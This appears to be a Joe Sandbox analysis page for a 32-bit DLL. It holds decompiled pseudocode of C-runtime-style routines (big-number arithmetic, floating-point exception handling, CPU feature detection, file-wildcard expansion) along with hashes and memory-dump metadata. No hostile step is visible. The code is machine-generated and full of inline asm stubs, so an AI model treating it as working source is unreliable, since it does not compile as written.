              												_t335 = 0;
              												__eflags = _t258;
              												if(_t258 != 0) {
              													_t246 = _v52;
              													_t201 = _a8 + 4;
              													__eflags = _t201;
              													_v56 = _t201;
              													_v20 = _t258;
              													do {
              														_v8 =  *_t201;
              														_t207 =  *_t246;
              														_t264 = _t315 + _v68 * _v8;
              														asm("adc esi, edx");
              														_t315 = _t335;
              														_t335 = 0;
              														__eflags = _t207 - _t264;
              														if(_t207 < _t264) {
              															_t315 = _t315 + 1;
              															asm("adc esi, esi");
              														}
              														 *_t246 = _t207 - _t264;
              														_t246 = _t246 + 4;
              														_t201 = _v56 + 4;
              														_t143 =  &_v20;
              														 *_t143 = _v20 - 1;
              														__eflags =  *_t143;
              														_v56 = _t201;
              													} while ( *_t143 != 0);
              													_t243 = _v24;
              													_t258 = _v72;
              												}
              												__eflags = 0 - _t335;
              												if(__eflags <= 0) {
              													if(__eflags < 0) {
              														L61:
              														__eflags = _t258;
              														if(_t258 != 0) {
              															_t245 = 0;
              															_t294 = _v52;
              															_t340 = _a8 + 4;
              															__eflags = _t340;
              															_t316 = _t258;
              															do {
              																_t260 =  *_t294;
              																_t151 = _t340 + 4; // 0x8d8b5959
              																_t340 = _t151;
              																_t294 = _t294 + 4;
              																asm("adc eax, eax");
              																 *((intOrPtr*)(_t294 - 4)) = _t260 +  *((intOrPtr*)(_t340 - 4)) + _t245;
              																asm("adc eax, 0x0");
              																_t245 = 0;
              																_t316 = _t316 - 1;
              																__eflags = _t316;
              															} while (_t316 != 0);
              															_t243 = _v24;
              														}
              														_t243 = _t243 + 0xffffffff;
              														asm("adc dword [ebp-0xc], 0xffffffff");
              													} else {
              														__eflags = _v76 - _t315;
              														if(_v76 < _t315) {
              															goto L61;
              														}
              													}
              												}
              												_t259 = _v48;
              												_v8 = _t259 - 1;
              											} else {
              												__eflags = _t243;
              												if(_t243 == 0) {
              													_t259 = _v48;
              												} else {
              													goto L52;
              												}
              											}
              											_t332 = _v32;
              											_t312 = _v12;
              											asm("adc esi, 0x0");
              											_v32 = 0 + _t243;
              											_t293 = _v80 - 1;
              											_v52 = _v52 - 4;
              											_t256 = _t259 - 1;
              											_t189 = _v28 - 4;
              											_v80 = _t293;
              											_v48 = _t256;
              											_v28 = _t189;
              											__eflags = _t293;
              										} while (_t293 >= 0);
              									}
              									_t239 = _a4;
              									_t255 = _v8 + 1;
              									_t185 = _t255;
              									__eflags = _t185 -  *_t239;
              									if(_t185 <  *_t239) {
              										_t288 =  &(( &(_t239[1]))[_t185]);
              										do {
              											 *_t288 = 0;
              											_t288 =  &(_t288[1]);
              											_t185 = _t185 + 1;
              											__eflags = _t185 -  *_t239;
              										} while (_t185 <  *_t239);
              									}
              									 *_t239 = _t255;
              									__eflags = _t255;
              									if(_t255 != 0) {
              										while(1) {
              											__eflags = _t239[_t255];
              											if(_t239[_t255] != 0) {
              												goto L75;
              											}
              											_t255 = _t255 + 0xffffffff;
              											__eflags = _t255;
              											 *_t239 = _t255;
              											if(_t255 != 0) {
              												continue;
              											}
              											goto L75;
              										}
              									}
              									L75:
              									return _v32;
              								}
              							}
              						} else {
              							_t6 = _t237 + 4; // 0xfffff8a4
              							_t299 =  *_t6;
              							_v8 = _t299;
              							if(_t299 != 1) {
              								__eflags = _t252;
              								if(_t252 != 0) {
              									_t247 = 0;
              									_v12 = 0;
              									_t323 = 0;
              									_v28 = 0;
              									__eflags = _t252 - 0xffffffff;
              									if(_t252 != 0xffffffff) {
              										_t276 = _t252 + 1;
              										__eflags = _t276;
              										_t277 =  &(_t179[_t276]);
              										_v32 = _t277;
              										do {
              											_push(_t247);
              											_t227 = E6DAA1E30( *_t277, _t323, _t299, 0);
              											_v28 = _t247;
              											_t247 = _v12;
              											_t323 = _t277;
              											_v64 = _t299;
              											_v12 = 0 + _t227;
              											_t299 = _v8;
              											asm("adc ebx, 0x0");
              											_t277 = _v32 - 4;
              											_v32 = _t277;
              											_t329 = _t329 - 1;
              											__eflags = _t329;
              										} while (_t329 != 0);
              										_t179 = _a4;
              									}
              									_t36 =  &(_t179[1]); // 0x4
              									_t348 = _t36;
              									 *_t179 = 0;
              									_v544 = 0;
              									E6DA90928(_t348, 0x1cc,  &_v540, 0);
              									_t223 = _v28;
              									_t300 = _a4;
              									__eflags = 0 - _t223;
              									 *_t348 = _t323;
              									asm("sbb ecx, ecx");
              									 *(_t300 + 8) = _t223;
              									__eflags =  ~0x00000000;
              									 *_t300 = 0xbadbae;
              									return _v12;
              								} else {
              									_t325 =  &(_t179[1]);
              									 *_t179 = _t252;
              									_v544 = _t252;
              									E6DA90928(_t325, 0x1cc,  &_v540, _t252);
              									_t230 = _t179[1];
              									_t305 = _t230 % _v8;
              									 *_t325 = _t305;
              									__eflags = 0 - _t305;
              									asm("sbb ecx, ecx");
              									__eflags = 0;
              									 *_a4 =  ~0x00000000;
              									return _t230 / _v8;
              								}
              							} else {
              								 *_t179 = _t311;
              								_v544 = _t311;
              								E6DA90928( &(_t179[1]), 0x1cc,  &_v540, _t311);
              								return _t179[1];
              							}
              						}
              					}
              				}
              			}

              0x6da908e3
              0x6da908e5
              0x6da908ea
              0x6da908f0
              0x6da908f0
              0x6da908f6
              0x6da908f9
              0x6da908fa
              0x6da908fa
              0x6da908f0
              0x6da908fe
              0x6da90900
              0x6da90902
              0x6da90904
              0x6da90904
              0x6da90908
              0x00000000
              0x00000000
              0x6da9090a
              0x6da9090a
              0x6da9090d
              0x6da9090f
              0x00000000
              0x00000000
              0x00000000
              0x6da9090f
              0x6da90904
              0x6da90911
              0x6da9091c
              0x6da9091c
              0x6da90638
              0x6da904da
              0x6da904da
              0x6da904da
              0x6da904dd
              0x6da904e3
              0x6da90514
              0x6da90516
              0x6da9055b
              0x6da9055d
              0x6da90564
              0x6da90566
              0x6da90569
              0x6da9056c
              0x6da9056e
              0x6da9056e
              0x6da9056f
              0x6da90572
              0x6da90575
              0x6da90575
              0x6da9057f
              0x6da90584
              0x6da90589
              0x6da9058c
              0x6da90591
              0x6da90598
              0x6da9059b
              0x6da9059e
              0x6da905a1
              0x6da905a4
              0x6da905a7
              0x6da905a7
              0x6da905a7
              0x6da905ac
              0x6da905ac
              0x6da905af
              0x6da905af
              0x6da905b2
              0x6da905c0
              0x6da905d1
              0x6da905d6
              0x6da905dc
              0x6da905e1
              0x6da905e3
              0x6da905e5
              0x6da905e9
              0x6da905ef
              0x6da905f1
              0x6da905fa
              0x6da90518
              0x6da9051b
              0x6da9051f
              0x6da9052e
              0x6da90534
              0x6da90539
              0x6da9053d
              0x6da90548
              0x6da9054a
              0x6da9054c
              0x6da90550
              0x6da90553
              0x6da9055a
              0x6da9055a
              0x6da904e5
              0x6da904eb
              0x6da904fb
              0x6da90501
              0x6da90513
              0x6da90513
              0x6da904e3
              0x6da904d4
              0x6da904c5

              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f079999708376b5f2720b3917fcdf58b9afd395b9802391cf29447260dcc6ee3
              • Instruction ID: bd4214c7983dede3aee10f8fd5e9a8b01e2dcc363d9be1aeb34214455bdd472d
              • Opcode Fuzzy Hash: f079999708376b5f2720b3917fcdf58b9afd395b9802391cf29447260dcc6ee3
              • Instruction Fuzzy Hash: D8F17075E1421A9FDB14CFA9C8806AEB7F1FF88364F158269E919EB380D7309941CF84
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA95CF6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
              				signed int _t172;
              				signed int _t175;
              				signed int _t178;
              				signed int* _t179;
              				signed char _t193;
              				signed int _t196;
              				signed int _t200;
              				signed int _t203;
              				void* _t204;
              				void* _t207;
              				signed int _t210;
              				void* _t211;
              				signed int _t226;
              				unsigned int* _t241;
              				signed char _t243;
              				signed int* _t251;
              				unsigned int* _t257;
              				signed int* _t258;
              				signed char _t260;
              				long _t263;
              				signed int* _t266;
              
              				 *(_a4 + 4) = 0;
              				_t263 = 0xc000000d;
              				 *(_a4 + 8) = 0;
              				 *(_a4 + 0xc) = 0;
              				_t243 = _a12;
              				if((_t243 & 0x00000010) != 0) {
              					_t263 = 0xc000008f;
              					 *(_a4 + 4) =  *(_a4 + 4) | 1;
              				}
              				if((_t243 & 0x00000002) != 0) {
              					_t263 = 0xc0000093;
              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
              				}
              				if((_t243 & 0x00000001) != 0) {
              					_t263 = 0xc0000091;
              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
              				}
              				if((_t243 & 0x00000004) != 0) {
              					_t263 = 0xc000008e;
              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
              				}
              				if((_t243 & 0x00000008) != 0) {
              					_t263 = 0xc0000090;
              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
              				}
              				_t266 = _a8;
              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
              				_t260 = E6DA9632C(_a4);
              				if((_t260 & 0x00000001) != 0) {
              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
              				}
              				if((_t260 & 0x00000004) != 0) {
              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
              				}
              				if((_t260 & 0x00000008) != 0) {
              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
              				}
              				if((_t260 & 0x00000010) != 0) {
              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
              				}
              				if((_t260 & 0x00000020) != 0) {
              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
              				}
              				_t172 =  *_t266 & 0x00000c00;
              				if(_t172 == 0) {
              					 *_a4 =  *_a4 & 0xfffffffc;
              				} else {
              					if(_t172 == 0x400) {
              						_t258 = _a4;
              						_t226 =  *_t258 & 0xfffffffd | 1;
              						L26:
              						 *_t258 = _t226;
              						L29:
              						_t175 =  *_t266 & 0x00000300;
              						if(_t175 == 0) {
              							_t251 = _a4;
              							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
              							L35:
              							 *_t251 = _t178;
              							L36:
              							_t179 = _a4;
              							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
              							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
              							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
              							if(_a28 == 0) {
              								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
              								 *((long long*)(_a4 + 0x10)) =  *_a20;
              								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
              								_t255 = _a4;
              								_t241 = _a24;
              								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
              								 *(_a4 + 0x50) =  *_t241;
              							} else {
              								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
              								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
              								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
              								_t241 = _a24;
              								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
              								 *(_a4 + 0x50) =  *_t241;
              							}
              							E6DA96298(_t255);
              							RaiseException(_t263, 0, 1,  &_a4);
              							_t257 = _a4;
              							_t193 = _t257[2];
              							if((_t193 & 0x00000010) != 0) {
              								 *_t266 =  *_t266 & 0xfffffffe;
              								_t193 = _t257[2];
              							}
              							if((_t193 & 0x00000008) != 0) {
              								 *_t266 =  *_t266 & 0xfffffffb;
              								_t193 = _t257[2];
              							}
              							if((_t193 & 0x00000004) != 0) {
              								 *_t266 =  *_t266 & 0xfffffff7;
              								_t193 = _t257[2];
              							}
              							if((_t193 & 0x00000002) != 0) {
              								 *_t266 =  *_t266 & 0xffffffef;
              								_t193 = _t257[2];
              							}
              							if((_t193 & 0x00000001) != 0) {
              								 *_t266 =  *_t266 & 0xffffffdf;
              							}
              							_t196 =  *_t257 & 0x00000003;
              							if(_t196 == 0) {
              								 *_t266 =  *_t266 & 0xfffff3ff;
              							} else {
              								_t207 = _t196 - 1;
              								if(_t207 == 0) {
              									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
              									L55:
              									 *_t266 = _t210;
              									L58:
              									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
              									if(_t200 == 0) {
              										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
              										L64:
              										 *_t266 = _t203;
              										L65:
              										if(_a28 == 0) {
              											 *_t241 = _t257[0x14];
              										} else {
              											 *_t241 = _t257[0x14];
              										}
              										return _t203;
              									}
              									_t204 = _t200 - 1;
              									if(_t204 == 0) {
              										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
              										goto L64;
              									}
              									_t203 = _t204 - 1;
              									if(_t203 == 0) {
              										 *_t266 =  *_t266 & 0xfffff3ff;
              									}
              									goto L65;
              								}
              								_t211 = _t207 - 1;
              								if(_t211 == 0) {
              									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
              									goto L55;
              								}
              								if(_t211 == 1) {
              									 *_t266 =  *_t266 | 0x00000c00;
              								}
              							}
              							goto L58;
              						}
              						if(_t175 == 0x200) {
              							_t251 = _a4;
              							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
              							goto L35;
              						}
              						if(_t175 == 0x300) {
              							 *_a4 =  *_a4 & 0xffffffe3;
              						}
              						goto L36;
              					}
              					if(_t172 == 0x800) {
              						_t258 = _a4;
              						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
              						goto L26;
              					}
              					if(_t172 == 0xc00) {
              						 *_a4 =  *_a4 | 0x00000003;
              					}
              				}
              			}

              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6DA95CF1,?,?,00000008,?,?,6DA9F2FB,00000000), ref: 6DA95F23
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: c251f4b0195f6abe2ac1d4a2b4aeb0004e924affff5c506a291d8e2d65b0e8b6
              • Instruction ID: c4012bfdf8e6090d4576bb29aade49e51aa9eeb0a0ce806a88d2b9902ccf12dc
              • Opcode Fuzzy Hash: c251f4b0195f6abe2ac1d4a2b4aeb0004e924affff5c506a291d8e2d65b0e8b6
              • Instruction Fuzzy Hash: 0CB14B36624609CFD705CF28C486B757BE0FF45365F298658E8A9CF2A5C336E982CB40
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 88%
              			E6DA89CE5(signed int __edx) {
              				signed int _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				signed int _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				intOrPtr _t60;
              				signed int _t61;
              				signed int _t62;
              				signed int _t63;
              				signed int _t66;
              				signed int _t67;
              				signed int _t73;
              				intOrPtr _t74;
              				intOrPtr _t75;
              				intOrPtr* _t77;
              				signed int _t78;
              				intOrPtr* _t82;
              				signed int _t85;
              				signed int _t90;
              				intOrPtr* _t93;
              				signed int _t96;
              				signed int _t99;
              				signed int _t104;
              
              				_t90 = __edx;
              				 *0x6dad51ac =  *0x6dad51ac & 0x00000000;
              				 *0x6dab3020 =  *0x6dab3020 | 0x00000001;
              				if(IsProcessorFeaturePresent(0xa) == 0) {
              					L23:
              					return 0;
              				}
              				_v20 = _v20 & 0x00000000;
              				_push(_t74);
              				_t93 =  &_v40;
              				asm("cpuid");
              				_t75 = _t74;
              				 *_t93 = 0;
              				 *((intOrPtr*)(_t93 + 4)) = _t74;
              				 *((intOrPtr*)(_t93 + 8)) = 0;
              				 *(_t93 + 0xc) = _t90;
              				_v16 = _v40;
              				_v12 = _v28 ^ 0x49656e69;
              				_v8 = _v36 ^ 0x756e6547;
              				_push(_t75);
              				asm("cpuid");
              				_t77 =  &_v40;
              				 *_t77 = 1;
              				 *((intOrPtr*)(_t77 + 4)) = _t75;
              				 *((intOrPtr*)(_t77 + 8)) = 0;
              				 *(_t77 + 0xc) = _t90;
              				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
              					L9:
              					_t96 =  *0x6dad51b0; // 0x2
              					L10:
              					_t85 = _v32;
              					_t60 = 7;
              					_v8 = _t85;
              					if(_v16 < _t60) {
              						_t78 = _v20;
              					} else {
              						_push(_t77);
              						asm("cpuid");
              						_t82 =  &_v40;
              						 *_t82 = _t60;
              						 *((intOrPtr*)(_t82 + 4)) = _t77;
              						 *((intOrPtr*)(_t82 + 8)) = 0;
              						_t85 = _v8;
              						 *(_t82 + 0xc) = _t90;
              						_t78 = _v36;
              						if((_t78 & 0x00000200) != 0) {
              							 *0x6dad51b0 = _t96 | 0x00000002;
              						}
              					}
              					_t61 =  *0x6dab3020; // 0x6f
              					_t62 = _t61 | 0x00000002;
              					 *0x6dad51ac = 1;
              					 *0x6dab3020 = _t62;
              					if((_t85 & 0x00100000) != 0) {
              						_t63 = _t62 | 0x00000004;
              						 *0x6dad51ac = 2;
              						 *0x6dab3020 = _t63;
              						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
              							asm("xgetbv");
              							_v24 = _t63;
              							_v20 = _t90;
              							_t104 = 6;
              							if((_v24 & _t104) == _t104) {
              								_t66 =  *0x6dab3020; // 0x6f
              								_t67 = _t66 | 0x00000008;
              								 *0x6dad51ac = 3;
              								 *0x6dab3020 = _t67;
              								if((_t78 & 0x00000020) != 0) {
              									 *0x6dad51ac = 5;
              									 *0x6dab3020 = _t67 | 0x00000020;
              									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
              										 *0x6dab3020 =  *0x6dab3020 | 0x00000040;
              										 *0x6dad51ac = _t104;
              									}
              								}
              							}
              						}
              					}
              					goto L23;
              				}
              				_t73 = _v40 & 0x0fff3ff0;
              				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
              					_t99 =  *0x6dad51b0; // 0x2
              					_t96 = _t99 | 0x00000001;
              					 *0x6dad51b0 = _t96;
              					goto L10;
              				} else {
              					goto L9;
              				}
              			}

              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6DA89CFB
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              • Opcode ID: ed34ab8c204651c5904ef67a2168b0efc0497880f2b787d5a1565a1c8d0b5b15
              • Instruction ID: bdba830c7c306c25d3c3a0419b878a88e805865221f2284e243e96fb18e82934
              • Opcode Fuzzy Hash: ed34ab8c204651c5904ef67a2168b0efc0497880f2b787d5a1565a1c8d0b5b15
              • Instruction Fuzzy Hash: D9515AB6A083068FEB05CF55C9817AABBF0FB4A314F14C42AE855EB291D3759A42CF54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E6DA994B5(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
              				signed int _v8;
              				signed int _v12;
              				intOrPtr* _v28;
              				intOrPtr* _v32;
              				intOrPtr _v36;
              				signed int _v48;
              				struct _WIN32_FIND_DATAW _v604;
              				char _v605;
              				void* _v612;
              				signed int _v616;
              				union _FINDEX_INFO_LEVELS _v620;
              				union _FINDEX_INFO_LEVELS _v624;
              				signed int _v628;
              				union _FINDEX_INFO_LEVELS _v632;
              				char _v636;
              				signed int _v640;
              				union _FINDEX_INFO_LEVELS _v644;
              				union _FINDEX_INFO_LEVELS _v648;
              				signed int _v652;
              				union _FINDEX_INFO_LEVELS _v656;
              				char _v660;
              				signed int _v664;
              				signed int _v668;
              				signed int _v672;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t72;
              				signed int _t77;
              				signed int _t79;
              				char _t81;
              				signed char _t82;
              				signed int _t88;
              				signed int _t94;
              				signed int _t100;
              				signed int _t103;
              				signed int _t104;
              				signed int _t106;
              				intOrPtr* _t112;
              				signed int _t115;
              				intOrPtr _t125;
              				signed int _t127;
              				signed int _t130;
              				signed int _t132;
              				void* _t135;
              				void* _t137;
              				intOrPtr _t139;
              				intOrPtr* _t142;
              				signed int _t144;
              				void* _t146;
              				intOrPtr* _t147;
              				signed int _t156;
              				void* _t164;
              				signed int _t167;
              				intOrPtr _t169;
              				void* _t170;
              				void* _t173;
              				void* _t174;
              				void* _t175;
              				signed int _t176;
              				signed int _t177;
              				signed int _t180;
              				void* _t181;
              				signed int _t182;
              				void* _t183;
              				void* _t184;
              
              				_push(__ecx);
              				_t142 = _a4;
              				_t2 = _t142 + 1; // 0x1
              				_t164 = _t2;
              				do {
              					_t72 =  *_t142;
              					_t142 = _t142 + 1;
              				} while (_t72 != 0);
              				_t167 = _a12;
              				_t144 = _t142 - _t164 + 1;
              				_v8 = _t144;
              				if(_t144 <=  !_t167) {
              					_t5 = _t167 + 1; // 0x1
              					_t135 = _t5 + _t144;
              					_t174 = E6DA9479A(_t135, 1);
              					_t146 = _t173;
              					__eflags = _t167;
              					if(_t167 == 0) {
              						L7:
              						_push(_v8);
              						_t135 = _t135 - _t167;
              						_t77 = E6DA9EA98(_t146, _t174 + _t167, _t135, _a4);
              						_t182 = _t181 + 0x10;
              						__eflags = _t77;
              						if(_t77 != 0) {
              							goto L12;
              						} else {
              							_t139 = _a16;
              							_t127 = E6DA99850(_t139);
              							_v8 = _t127;
              							__eflags = _t127;
              							if(_t127 == 0) {
              								 *( *(_t139 + 4)) = _t174;
              								_t177 = 0;
              								_t14 = _t139 + 4;
              								 *_t14 =  *(_t139 + 4) + 4;
              								__eflags =  *_t14;
              							} else {
              								E6DA94760(_t174);
              								_t177 = _v8;
              							}
              							E6DA94760(0);
              							_t130 = _t177;
              							goto L4;
              						}
              					} else {
              						_push(_t167);
              						_t132 = E6DA9EA98(_t146, _t174, _t135, _a8);
              						_t182 = _t181 + 0x10;
              						__eflags = _t132;
              						if(_t132 != 0) {
              							L12:
              							_push(0);
              							_push(0);
              							_push(0);
              							_push(0);
              							_push(0);
              							E6DA8DAEC();
              							asm("int3");
              							_t180 = _t182;
              							_t183 = _t182 - 0x298;
              							_t79 =  *0x6dab3014; // 0x6c4e8ceb
              							_v48 = _t79 ^ _t180;
              							_t147 = _v32;
              							_t165 = _v28;
              							_push(_t135);
              							_push(0);
              							_t169 = _v36;
              							_v648 = _t165;
              							__eflags = _t147 - _t169;
              							if(_t147 != _t169) {
              								while(1) {
              									_t125 =  *_t147;
              									__eflags = _t125 - 0x2f;
              									if(_t125 == 0x2f) {
              										break;
              									}
              									__eflags = _t125 - 0x5c;
              									if(_t125 != 0x5c) {
              										__eflags = _t125 - 0x3a;
              										if(_t125 != 0x3a) {
              											_t147 = E6DA9F970(_t169, _t147);
              											__eflags = _t147 - _t169;
              											if(_t147 != _t169) {
              												continue;
              											}
              										}
              									}
              									break;
              								}
              								_t165 = _v612;
              							}
              							_t81 =  *_t147;
              							_v605 = _t81;
              							__eflags = _t81 - 0x3a;
              							if(_t81 != 0x3a) {
              								L23:
              								__eflags = _t81 - 0x2f;
              								if(__eflags == 0) {
              									L26:
              									_t82 = 1;
              								} else {
              									__eflags = _t81 - 0x5c;
              									if(__eflags == 0) {
              										goto L26;
              									} else {
              										__eflags = _t81 - 0x3a;
              										_t82 = 0;
              										if(__eflags == 0) {
              											goto L26;
              										}
              									}
              								}
              								_v660 = 0;
              								_v656 = 0;
              								_push(_t174);
              								asm("sbb eax, eax");
              								_v652 = 0;
              								_v648 = 0;
              								_v664 =  ~(_t82 & 0x000000ff) & _t147 - _t169 + 0x00000001;
              								_v644 = 0;
              								_v640 = 0;
              								_t88 = E6DA90DCD(_t147 - _t169 + 1, _t169,  &_v660, E6DA991EA(_t165, __eflags));
              								_t184 = _t183 + 0xc;
              								asm("sbb eax, eax");
              								_t175 = FindFirstFileExW( !( ~_t88) & _v652, 0,  &_v604, 0, 0, 0);
              								__eflags = _t175 - 0xffffffff;
              								if(_t175 != 0xffffffff) {
              									_t151 = _v612;
              									_t94 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
              									__eflags = _t94;
              									_v668 = _t94 >> 2;
              									do {
              										_v636 = 0;
              										_v632 = 0;
              										_v628 = 0;
              										_v624 = 0;
              										_v620 = 0;
              										_v616 = 0;
              										_t100 = E6DA99272( &(_v604.cFileName),  &_v636,  &_v605, E6DA991EA(_t165, __eflags));
              										_t184 = _t184 + 0x10;
              										asm("sbb eax, eax");
              										_t103 =  !( ~_t100) & _v628;
              										__eflags =  *_t103 - 0x2e;
              										if( *_t103 != 0x2e) {
              											L36:
              											_push(_v612);
              											_t104 = E6DA994B5(_t151, _t103, _t169, _v664);
              											_t184 = _t184 + 0x10;
              											_v672 = _t104;
              											__eflags = _t104;
              											if(_t104 != 0) {
              												__eflags = _v616;
              												if(_v616 != 0) {
              													E6DA94760(_v628);
              												}
              												FindClose(_t175);
              												__eflags = _v640;
              												if(_v640 != 0) {
              													E6DA94760(_v652);
              												}
              												_t106 = _v672;
              											} else {
              												goto L37;
              											}
              										} else {
              											_t151 =  *((intOrPtr*)(_t103 + 1));
              											__eflags = _t151;
              											if(_t151 == 0) {
              												goto L37;
              											} else {
              												__eflags = _t151 - 0x2e;
              												if(_t151 != 0x2e) {
              													goto L36;
              												} else {
              													__eflags =  *(_t103 + 2);
              													if( *(_t103 + 2) == 0) {
              														goto L37;
              													} else {
              														goto L36;
              													}
              												}
              											}
              										}
              										goto L50;
              										L37:
              										__eflags = _v616;
              										if(_v616 != 0) {
              											E6DA94760(_v628);
              											_pop(_t151);
              										}
              										__eflags = FindNextFileW(_t175,  &_v604);
              									} while (__eflags != 0);
              									_t112 = _v612;
              									_t156 = _v668;
              									_t165 =  *_t112;
              									_t115 =  *((intOrPtr*)(_t112 + 4)) -  *_t112 >> 2;
              									__eflags = _t156 - _t115;
              									if(_t156 != _t115) {
              										__eflags = _t115 - _t156;
              										E6DA9F440(_t165, _t165 + _t156 * 4, _t115 - _t156, 4, E6DA9925A);
              									}
              									FindClose(_t175);
              									__eflags = _v640;
              									if(_v640 != 0) {
              										E6DA94760(_v652);
              									}
              									_t106 = 0;
              								} else {
              									_push(_v612);
              									_t176 = E6DA994B5( &_v604, _t169, 0, 0);
              									__eflags = _v640;
              									if(_v640 != 0) {
              										E6DA94760(_v652);
              									}
              									_t106 = _t176;
              								}
              								L50:
              								_pop(_t174);
              							} else {
              								__eflags = _t147 - _t169 + 1;
              								if(_t147 == _t169 + 1) {
              									_t81 = _v605;
              									goto L23;
              								} else {
              									_push(_t165);
              									_t106 = E6DA994B5(_t147, _t169, 0, 0);
              								}
              							}
              							_pop(_t170);
